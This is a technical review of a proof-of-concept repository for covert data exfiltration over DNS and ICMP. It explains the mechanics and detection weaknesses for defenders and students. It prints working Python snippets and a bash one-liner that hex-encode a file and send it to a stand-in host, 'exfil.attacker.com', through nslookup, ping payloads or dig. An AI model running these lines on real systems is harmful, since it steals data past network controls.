Building Covert Channels: A Technical Dissection of DNS and ICMP Data Exfiltration

Hook

Every DNS query your application makes could be leaking gigabytes of data to an attacker, and your firewall wouldn't even blink. Welcome to the world of covert channels, where legitimate protocols become data highways.

Context

Data exfiltration—the unauthorized transfer of data from a compromised system—remains one of the most challenging problems in network security. Traditional perimeter defenses excel at blocking suspicious outbound connections, but they struggle with a fundamental dilemma: how do you distinguish malicious traffic from legitimate business operations when attackers use the same protocols your applications depend on?

This is where covert channels shine from an attacker's perspective. By embedding stolen data within DNS queries, ICMP ping packets, or even HTTP headers, adversaries can bypass firewalls that must allow these protocols for normal operations. The glennzw/exphil repository demonstrates exactly these techniques through minimalist proof-of-concept scripts. While the project itself is intentionally simple—focused on education rather than operational tooling—it provides an excellent window into the mechanics of data exfiltration and forces us to confront an uncomfortable truth: the protocols we trust most are often the easiest to abuse.

Technical Insight

The repository implements two classic exfiltration vectors: DNS query tunneling and ICMP payload embedding. Let's dissect both to understand what makes them effective and why defenders struggle to stop them.

The DNS exfiltration method is elegantly simple yet surprisingly capable. It works by encoding target file data as hexadecimal, then breaking it into chunks that become subdomains in DNS queries sent to an attacker-controlled nameserver. Here's a simplified version of the core logic:

# Encode file to hex and chunk it
with open(target_file, 'rb') as f:
    data = f.read()
    hex_data = data.hex()
    
# Split into chunks that fit in DNS labels (63 chars max)
chunk_size = 60
chunks = [hex_data[i:i+chunk_size] for i in range(0, len(hex_data), chunk_size)]

# Send each chunk as a DNS query
for idx, chunk in enumerate(chunks):
    # Format: chunk-index.total-chunks.data.attacker-domain.com
    query = f"{idx}.{len(chunks)}.{chunk}.exfil.attacker.com"
    os.system(f"nslookup {query}")

What makes this technique powerful is its abuse of a protocol that must exist for modern networks to function. DNS queries traverse virtually every firewall configuration because blocking them would break name resolution for legitimate applications. The attacker's nameserver receives these queries in its logs, extracts the embedded data from subdomain labels, and reassembles the original file. The repository includes MD5 checksum transmission to verify data integrity—a detail that separates toy demos from techniques actually used in penetration tests.

The ICMP exfiltration approach takes a different angle by stuffing data directly into ping packet payloads. Standard ping implementations already include arbitrary data (usually just padding), so modifying that payload to contain file chunks raises fewer red flags than you might expect:

import subprocess
import struct

with open(target_file, 'rb') as f:
    while True:
        chunk = f.read(48)  # ICMP payload size
        if not chunk:
            break
        
        # Encode chunk as hex pattern for ping payload
        hex_pattern = chunk.hex()
        subprocess.run([
            'ping', '-c', '1',
            '-p', hex_pattern,  # Custom payload pattern
            'attacker.com'
        ])

On the receiving end, the attacker runs packet capture filtering for ICMP traffic from the compromised host, extracts payload data from each packet, and reconstructs the file. This method is particularly insidious because ICMP is often allowed outbound for network diagnostics—blocking it would prevent troubleshooting tools from functioning.

Both techniques share a critical characteristic: they're stateless and asynchronous. Unlike traditional tunneling that establishes persistent connections, these methods fire-and-forget individual packets. This makes them resilient to network interruptions and harder to detect through connection analysis. A security analyst looking at netflow data might see dozens of DNS queries or pings, but without deep packet inspection, they appear completely benign.

The bash one-liner included for DNS exfiltration deserves special mention for its elegance:

xxd -p file.txt | while read line; do dig $line.exfil.attacker.com; done

This single command hexdumps a file, reads it line by line, and sends each line as a DNS query—demonstrating that sophisticated attacks don't require sophisticated code. An attacker gaining shell access needs only basic Unix utilities to begin exfiltrating data, no custom tooling required.

The architectural simplicity here is actually instructive. By stripping away encryption, error correction, and stealth features, these scripts expose the bare mechanics of covert channels. Understanding these fundamentals is crucial whether you're building detection systems, conducting security assessments, or architecting defenses.

Gotcha

The repository's documentation correctly labels these as proof-of-concept scripts, and you should take that designation seriously. Using these scripts in actual security engagements would be immediately detected by any competent blue team for several reasons.

First, the DNS exfiltration is absurdly noisy. Sending hundreds or thousands of DNS queries with long hexadecimal subdomains creates obvious patterns that DNS analytics tools flag instantly. Modern DNS security solutions baseline normal query behavior and alert on statistical anomalies—sudden spikes in query volume, excessive subdomain lengths, high entropy in domain names, and repeated queries to newly-registered domains all trigger alerts. These scripts do nothing to evade such detection. Real-world DNS exfiltration tools implement query throttling, domain generation algorithms, and encoding schemes that mimic legitimate subdomain patterns. The ICMP method suffers similar issues: unusual ping frequencies, non-standard payload sizes, and high-entropy payload data all stand out. Additionally, neither method implements encryption, meaning any intercepted traffic reveals the exfiltrated data in plaintext (well, hex-encoded, which is trivially decoded). For educational purposes or demonstrating attack concepts to stakeholders who need to understand threats, these scripts are perfect. For actual red team operations, they're dangerously inadequate and would likely get you caught before exfiltrating meaningful data volumes.

Verdict

Use if: You're building detection rules and need canonical examples of exfiltration techniques to test against; you're teaching security concepts and want minimal code that clearly demonstrates covert channel mechanics; or you're conducting a basic security assessment where demonstrating the vulnerability concept matters more than evading detection. Use if: You're a blue team member who wants to understand what attack patterns to look for in DNS logs and ICMP traffic. Skip if: You need operational red team tooling—these scripts lack the stealth, error handling, and encryption required for realistic engagements. Skip if: You're looking for high-throughput data tunneling solutions; the performance here is abysmal by design. Skip if: You want something you can deploy without modification; treat this as reference material and starting point for building more sophisticated tools, not as finished products. For actual security testing, graduate to dnscat2, Cobalt Strike's built-in exfiltration, or custom implementations with proper OPSEC considerations.